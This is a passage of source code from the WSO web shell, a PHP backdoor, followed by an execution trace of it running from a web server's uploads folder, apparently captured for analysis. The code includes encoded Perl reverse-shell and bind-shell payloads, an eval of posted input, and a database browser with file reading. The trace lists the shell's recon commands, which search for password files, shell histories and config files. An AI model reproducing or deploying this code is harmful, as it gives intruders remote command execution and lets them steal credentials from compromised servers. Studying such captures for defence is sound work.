                case "UTF-8":
                    $db->setCharset('utf8');
                    break;
                case "KOI8-R":
                    $db->setCharset('koi8r');
                    break;
                case "KOI8-U":
                    $db->setCharset('koi8u');
                    break;
                case "cp866":
                    $db->setCharset('cp866');
                    break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while ($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
            }
            echo "</select>";
        } else {
            echo $tmp;
        }
    } else {
        echo $tmp;
    }
    echo "</td>\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\n                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\n\t\t\t</tr>\n\t\t</table>\n\t\t<script>\n            s_db='" . @addslashes($_POST['sql_base']) . "';\n            function fs(f) {\n                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\n                    if(f.p1) f.p1.value='';\n                    if(f.p2) f.p2.value='';\n                    if(f.p3) f.p3.value='';\n                }\n            }\n\t\t\tfunction st(t,l) {\n\t\t\t\td.sf.p1.value = 'select';\n\t\t\t\td.sf.p2.value = t;\n                if(l && d.sf.p3) d.sf.p3.value = l;\n\t\t\t\td.sf.submit();\n\t\t\t}\n\t\t\tfunction is() {\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\n\t\t\t}\n\t\t</script>";
    if (isset($db) && $db->link) {
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
        if (!empty($_POST['sql_base'])) {
            $db->selectdb($_POST['sql_base']);
            echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
            $tbls_res = $db->listTables();
            while ($item = $db->fetch($tbls_res)) {
                list($key, $value) = each($item);
                if (!empty($_POST['sql_count'])) {
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
                }
                $value = htmlspecialchars($value);
                echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small>({$n['n']})</small>") . "</nobr><br>";
            }
            echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
            if (@$_POST['p1'] == 'select') {
                $_POST['p1'] = 'query';
                $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
                $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
                $num = $db->fetch();
                $pages = ceil($num['n'] / 30);
                echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">";
                echo " of {$pages}";
                if ($_POST['p3'] > 1) {
                    echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>&lt; Prev</a>";
                }
                if ($_POST['p3'] < $pages) {
                    echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next &gt;</a>";
                }
                $_POST['p3']--;
                if ($_POST['type'] == 'pgsql') {
                    $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30;
                } else {
                    $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30';
                }
                echo "<br><br>";
            }
            if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
                $db->query(@$_POST['p2']);
                if ($db->res !== false) {
                    $title = false;
                    echo "<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">";
                    $line = 1;
                    while ($item = $db->fetch()) {
                        if (!$title) {
                            echo "<tr>";
                            foreach ($item as $key => $value) {
                                echo '<th>' . $key . '</th>';
                            }
                            reset($item);
                            $title = true;
                            echo "</tr><tr>";
                            $line = 2;
                        }
                        echo '<tr class="l' . $line . '">';
                        $line = $line == 1 ? 2 : 1;
                        foreach ($item as $key => $value) {
                            if ($value == null) {
                                echo "<td><i>null</i></td>";
                            } else {
                                echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
                            }
                        }
                        echo "</tr>";
                    }
                    echo "</table>";
                } else {
                    echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
                }
            }
            echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
            if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
                echo htmlspecialchars($_POST['p2']);
            }
            echo "</textarea><br/><input type=submit value='Execute'>";
            echo "</td></tr>";
        }
        echo "</table></form><br/>";
        if ($_POST['type'] == 'mysql') {
            $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
            if ($db->fetch()) {
                echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
        }
        if (@$_POST['p1'] == 'loadfile') {
            $file = $db->loadFile($_POST['p2']);
            echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
        }
    } else {
        echo htmlspecialchars($db->error());
    }
    echo "</div>";
    wsoFooter();
}
function actionNetwork()
{
    wsoHeader();
    $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    echo "<h1>Network tools</h1><div class=content>\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\n\t<span>Bind port to /bin/sh [perl]</span><br/>\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\n\t</form>\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\n\t<span>Back-connect  [perl]</span><br/>\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\n\t</form><br>";
    if (isset($_POST['p1'])) {
        function cf($f, $t)
        {
            $w = @fopen($f, "w") or @function_exists('file_put_contents');
            if ($w) {
                @fwrite($w, @base64_decode($t));
                @fclose($w);
            }
        }
        if ($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl", $bind_port_p);
            $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
            unlink("/tmp/bp.pl");
        }
        if ($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl", $back_connect_p);
            $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
            unlink("/tmp/bc.pl");
        }
    }
    echo "</div>";
    wsoFooter();
}
function actionRC()
{
    if (!@$_POST['p1']) {
        $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get('safe_mode'));
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
if (empty($_POST['a'])) {
    if (isset($default_action) && function_exists('action' . $default_action)) {
        $_POST['a'] = $default_action;
    } else {
        $_POST['a'] = 'SecInfo';
    }
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
    call_user_func('action' . $_POST['a']);
}
exit;

Execution traces

data/traces/85ce69862572d836cffe0e38f4365c2d_trace-1676255732.1659.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:35:58.063751]
1	0	1	0.000177	393512
1	3	0	0.002351	887280	{main}	1		/var/www/html/uploads/wso.php	0	0
1		A						/var/www/html/uploads/wso.php	2	$color = '#df5'
1		A						/var/www/html/uploads/wso.php	3	$default_action = 'FilesMan'
1		A						/var/www/html/uploads/wso.php	4	$default_use_ajax = TRUE
1		A						/var/www/html/uploads/wso.php	5	$default_charset = 'Windows-1251'
1		A						/var/www/html/uploads/wso.php	13	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
2	4	0	0.002462	887280	implode	0		/var/www/html/uploads/wso.php	14	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
2	4	1	0.002483	887424
2	4	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
2	5	0	0.002501	887360	preg_match	0		/var/www/html/uploads/wso.php	14	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i'	'python-requests/2.25.1'
2	5	1	0.002519	887424
2	5	R			0
2	6	0	0.002533	887280	ini_set	0		/var/www/html/uploads/wso.php	20	2	'error_log'	NULL
2	6	1	0.002549	887352
2	6	R			''
2	7	0	0.002562	887280	ini_set	0		/var/www/html/uploads/wso.php	21	2	'log_errors'	0
2	7	1	0.002576	887352
2	7	R			'1'
2	8	0	0.002588	887280	ini_set	0		/var/www/html/uploads/wso.php	22	2	'max_execution_time'	0
2	8	1	0.002603	887384
2	8	R			'30'
2	9	0	0.002616	887280	set_time_limit	0		/var/www/html/uploads/wso.php	23	1	0
2	9	1	0.002630	887344
2	9	R			FALSE
2	10	0	0.002643	887312	function_exists	0		/var/www/html/uploads/wso.php	24	1	'set_magic_quotes_runtime'
2	10	1	0.002656	887352
2	10	R			FALSE
2	11	0	0.002669	887312	define	0		/var/www/html/uploads/wso.php	27	2	'WSO_VERSION'	'2.5'
2	11	1	0.002683	887416
2	11	R			TRUE
2	12	0	0.002695	887344	get_magic_quotes_gpc	0		/var/www/html/uploads/wso.php	29	0
2	12	1	0.002708	887344
2	12	R			FALSE
2	13	0	0.002721	887344	substr	0		/var/www/html/uploads/wso.php	54	3	'Linux'	0	3
2	13	1	0.002735	887472
2	13	R			'Lin'
2	14	0	0.002747	887376	strtolower	0		/var/www/html/uploads/wso.php	54	1	'Lin'
2	14	1	0.002760	887440
2	14	R			'lin'
1		A						/var/www/html/uploads/wso.php	57	$os = 'nix'
2	15	0	0.002783	887344	ini_get	0		/var/www/html/uploads/wso.php	59	1	'safe_mode'
2	15	1	0.002795	887376
2	15	R			FALSE
1		A						/var/www/html/uploads/wso.php	59	$safe_mode = FALSE
2	16	0	0.002818	887344	error_reporting	0		/var/www/html/uploads/wso.php	61	1	0
2	16	1	0.002831	887384
2	16	R			22527
2	17	0	0.002843	887344	ini_get	0		/var/www/html/uploads/wso.php	63	1	'disable_functions'
2	17	1	0.002856	887824
2	17	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/wso.php	63	$disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2	18	0	0.002901	887792	getcwd	0		/var/www/html/uploads/wso.php	64	0
2	18	1	0.002915	887840
2	18	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/wso.php	64	$home_cwd = '/var/www/html/uploads'
2	19	0	0.002940	887840	getcwd	0		/var/www/html/uploads/wso.php	67	0
2	19	1	0.002965	887888
2	19	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/wso.php	67	$cwd = '/var/www/html/uploads'
1		A						/var/www/html/uploads/wso.php	73	$cwd .= '/'
2	20	0	0.003003	887888	md5	0		/var/www/html/uploads/wso.php	75	1	'localhost'
2	20	1	0.003016	887984
2	20	R			'421aa90e079fa326b6494f812ad13e79'
2	21	0	0.003032	887888	md5	0		/var/www/html/uploads/wso.php	76	1	'localhost'
2	21	1	0.003044	887984
2	21	R			'421aa90e079fa326b6494f812ad13e79'
1		A						/var/www/html/uploads/wso.php	76	_COOKIE['421aa90e079fa326b6494f812ad13e79ajax'] = TRUE
1		A						/var/www/html/uploads/wso.php	92	$aliases = ['List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find all suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find all sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable folders and files' => 'find / -perm -2 -ls', 'find all writable folders and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf files' => 'locate httpd.conf', 'locate vhosts.conf files' => 'locate vhosts.conf', 'locate proftpd.conf files' => 'locate proftpd.conf', 'locate psybnc.conf files' => 'locate psybnc.conf', 'locate my.conf files' => 'locate my.conf', 'locate admin.php files' => 'locate admin.php', 'locate cfg.php files' => 'locate cfg.php', 'locate conf.php files' => 'locate conf.php', 'locate config.dat files' => 'locate config.dat', 'locate config.php files' => 'locate config.php', 'locate config.inc files' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php files' => 'locate config.default.php', 'locate config* files ' => 'locate config', 'locate .conf files' => 'locate \'.conf\'', 'locate .pwd files' => 'locate \'.pwd\'', 'locate .sql files' => 'locate \'.sql\'', 'locate .htpasswd files' => 'locate \'.htpasswd\'', 'locate .bash_history files' => 'locate \'.bash_history\'', 'locate .mysql_history files' => 'locate \'.mysql_history\'', 'locate .fetchmailrc files' => 'locate \'.fetchmailrc\'', 'locate backup files' => 'locate backup', 'locate dump files' => 'locate dump', 'locate priv files' => 'locate priv']
2	22	0	0.003149	888328	function_exists	0		/var/www/html/uploads/wso.php	307	1	'posix_getpwuid'
2	22	1	0.003164	888368
2	22	R			TRUE
2	23	0	0.003177	888328	function_exists	0		/var/www/html/uploads/wso.php	309	1	'posix_getgrgid'
2	23	1	0.003190	888368
2	23	R			TRUE
2	24	0	0.003204	888368	function_exists	0		/var/www/html/uploads/wso.php	1519	1	'actionFilesMan'
2	24	1	0.003219	888408
2	24	R			TRUE
1		A						/var/www/html/uploads/wso.php	1520	_POST['a'] = 'FilesMan'
2	25	0	0.003244	888744	function_exists	0		/var/www/html/uploads/wso.php	1523	1	'actionFilesMan'
2	25	1	0.003258	888784
2	25	R			TRUE
2	26	0	0.003272	888704	actionFilesMan	1		/var/www/html/uploads/wso.php	1524	0
3	27	0	0.003285	888704	wsoHeader	1		/var/www/html/uploads/wso.php	636	0
3		A						/var/www/html/uploads/wso.php	143	_POST['charset'] = 'Windows-1251'
4	28	0	0.003313	889984	htmlspecialchars	0		/var/www/html/uploads/wso.php	169	1	'/var/www/html/uploads/'
4	28	1	0.003329	890176
4	28	R			'/var/www/html/uploads/'
4	29	0	0.003344	889984	htmlspecialchars	0		/var/www/html/uploads/wso.php	170	1	'FilesMan'
4	29	1	0.003357	890176
4	29	R			'FilesMan'
4	30	0	0.003372	889984	htmlspecialchars	0		/var/www/html/uploads/wso.php	171	1	'Windows-1251'
4	30	1	0.003385	890176
4	30	R			'Windows-1251'
4	31	0	0.003401	889984	strpos	0		/var/www/html/uploads/wso.php	172	2	NULL	'\n'
4	31	1	0.003415	890056
4	31	R			FALSE
4	32	0	0.003429	889984	htmlspecialchars	0		/var/www/html/uploads/wso.php	172	2	NULL	3
4	32	1	0.003442	890216
4	32	R			''
4	33	0	0.003456	889984	strpos	0		/var/www/html/uploads/wso.php	173	2	NULL	'\n'
4	33	1	0.003469	890056
4	33	R			FALSE
4	34	0	0.003483	889984	htmlspecialchars	0		/var/www/html/uploads/wso.php	173	2	NULL	3
4	34	1	0.003495	890216
4	34	R			''
4	35	0	0.003509	890240	strpos	0		/var/www/html/uploads/wso.php	174	2	NULL	'\n'
4	35	1	0.003522	890312
4	35	R			FALSE
4	36	0	0.003535	890240	htmlspecialchars	0		/var/www/html/uploads/wso.php	174	2	NULL	3
4	36	1	0.003548	890472
4	36	R			''
4	37	0	0.003561	890752	addslashes	0		/var/www/html/uploads/wso.php	193	1	'/uploads/wso.php'
4	37	1	0.003574	890784
4	37	R			'/uploads/wso.php'
4	38	0	0.003589	888704	diskfreespace	0		/var/www/html/uploads/wso.php	225	1	'/var/www/html/uploads/'
4	38	1	0.003607	888736
4	38	R			197962481664
3		A						/var/www/html/uploads/wso.php	225	$freeSpace = 197962481664
4	39	0	0.003633	888704	disk_total_space	0		/var/www/html/uploads/wso.php	226	1	'/var/www/html/uploads/'
4	39	1	0.003648	888736
4	39	R			232015802368
3		A						/var/www/html/uploads/wso.php	226	$totalSpace = 232015802368
3		A						/var/www/html/uploads/wso.php	227	$totalSpace = 232015802368
4	40	0	0.003683	888704	php_uname	0		/var/www/html/uploads/wso.php	228	1	'r'
4	40	1	0.003697	888784
4	40	R			'5.15.0-60-generic'
3		A						/var/www/html/uploads/wso.php	228	$release = '5.15.0-60-generic'
4	41	0	0.003722	888752	php_uname	0		/var/www/html/uploads/wso.php	229	1	's'
4	41	1	0.003734	888816
4	41	R			'Linux'
3		A						/var/www/html/uploads/wso.php	229	$kernel = 'Linux'
3		A						/var/www/html/uploads/wso.php	230	$explink = 'http://exploit-db.com/search/?action=search&filter_description='
4	42	0	0.003772	888784	strpos	0		/var/www/html/uploads/wso.php	231	2	'Linux'	'Linux'
4	42	1	0.003784	888856
4	42	R			0
4	43	0	0.003797	888784	substr	0		/var/www/html/uploads/wso.php	232	3	'5.15.0-60-generic'	0	6
4	43	1	0.003811	888912
4	43	R			'5.15.0'
4	44	0	0.003824	888832	urlencode	0		/var/www/html/uploads/wso.php	232	1	'Linux Kernel 5.15.0'
4	44	1	0.003842	888912
4	44	R			'Linux+Kernel+5.15.0'
3		A						/var/www/html/uploads/wso.php	232	$explink .= 'Linux+Kernel+5.15.0'
4	45	0	0.003868	888896	function_exists	0		/var/www/html/uploads/wso.php	235	1	'posix_getegid'
4	45	1	0.003881	888936
4	45	R			TRUE
4	46	0	0.003906	888896	posix_geteuid	0		/var/www/html/uploads/wso.php	241	0
4	46	1	0.003919	888896
4	46	R			33
4	47	0	0.003932	888896	posix_getpwuid	0		/var/www/html/uploads/wso.php	241	1	33
4	47	1	0.003971	889728
4	47	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
3		A						/var/www/html/uploads/wso.php	241	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4	48	0	0.004015	889696	posix_getegid	0		/var/www/html/uploads/wso.php	242	0
4	48	1	0.004028	889696
4	48	R			33
4	49	0	0.004040	889696	posix_getgrgid	0		/var/www/html/uploads/wso.php	242	1	33
4	49	1	0.004066	890360
4	49	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3		A						/var/www/html/uploads/wso.php	242	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3		A						/var/www/html/uploads/wso.php	243	$user = 'www-data'
3		A						/var/www/html/uploads/wso.php	244	$uid = 33
3		A						/var/www/html/uploads/wso.php	245	$group = 'www-data'
3		A						/var/www/html/uploads/wso.php	246	$gid = 33
3		A						/var/www/html/uploads/wso.php	249	$cwd_links = ''
4	50	0	0.004167	888976	explode	0		/var/www/html/uploads/wso.php	250	2	'/'	'/var/www/html/uploads/'
4	50	1	0.004182	889584
4	50	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3		A						/var/www/html/uploads/wso.php	250	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3		A						/var/www/html/uploads/wso.php	251	$n = 6
3		A						/var/www/html/uploads/wso.php	252	$i = 0
3		A						/var/www/html/uploads/wso.php	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php	254	$j = 0
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	256	$cwd_links .= '")\'>/</a>'
3		A						/var/www/html/uploads/wso.php	252	$i++
3		A						/var/www/html/uploads/wso.php	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php	254	$j = 0
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	256	$cwd_links .= '")\'>var/</a>'
3		A						/var/www/html/uploads/wso.php	252	$i++
3		A						/var/www/html/uploads/wso.php	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php	254	$j = 0
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'www/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	256	$cwd_links .= '")\'>www/</a>'
3		A						/var/www/html/uploads/wso.php	252	$i++
3		A						/var/www/html/uploads/wso.php	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php	254	$j = 0
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'www/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'html/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	256	$cwd_links .= '")\'>html/</a>'
3		A						/var/www/html/uploads/wso.php	252	$i++
3		A						/var/www/html/uploads/wso.php	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php	254	$j = 0
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'www/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'html/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	255	$cwd_links .= 'uploads/'
3		A						/var/www/html/uploads/wso.php	254	$j++
3		A						/var/www/html/uploads/wso.php	256	$cwd_links .= '")\'>uploads/</a>'
3		A						/var/www/html/uploads/wso.php	252	$i++
3		A						/var/www/html/uploads/wso.php	259	$charsets = [0 => 'UTF-8', 1 => 'Windows-1251', 2 => 'KOI8-R', 3 => 'KOI8-U', 4 => 'cp866']
3		A						/var/www/html/uploads/wso.php	260	$opt_charsets = ''
3		A						/var/www/html/uploads/wso.php	262	$opt_charsets .= '<option value="UTF-8" >UTF-8</option>'
3		A						/var/www/html/uploads/wso.php	262	$opt_charsets .= '<option value="Windows-1251" selected>Windows-1251</option>'
3		A						/var/www/html/uploads/wso.php	262	$opt_charsets .= '<option value="KOI8-R" >KOI8-R</option>'
3		A						/var/www/html/uploads/wso.php	262	$opt_charsets .= '<option value="KOI8-U" >KOI8-U</option>'
3		A						/var/www/html/uploads/wso.php	262	$opt_charsets .= '<option value="cp866" >cp866</option>'
3		A						/var/www/html/uploads/wso.php	264	$m = ['Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network']
3		A						/var/www/html/uploads/wso.php	267	$m['Self remove'] = 'SelfRemove'
3		A						/var/www/html/uploads/wso.php	268	$menu = ''
3		A						/var/www/html/uploads/wso.php	269	$k = 'Sec. Info'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'SecInfo\',null,\'\',\'\',\'\')">Sec. Info</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Files'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">Files</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Console'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Console\',null,\'\',\'\',\'\')">Console</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Sql'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Sql\',null,\'\',\'\',\'\')">Sql</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Php'
